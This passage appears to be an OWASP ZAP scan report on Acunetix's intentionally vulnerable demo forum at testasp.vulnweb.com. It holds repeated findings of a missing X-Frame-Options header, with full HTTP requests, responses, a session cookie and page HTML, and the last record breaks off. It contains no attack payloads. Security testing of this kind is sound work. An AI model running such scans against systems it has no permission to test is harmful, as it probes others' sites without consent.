<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 399 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3256 |
| Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3615 |
| Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3613 |
| Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
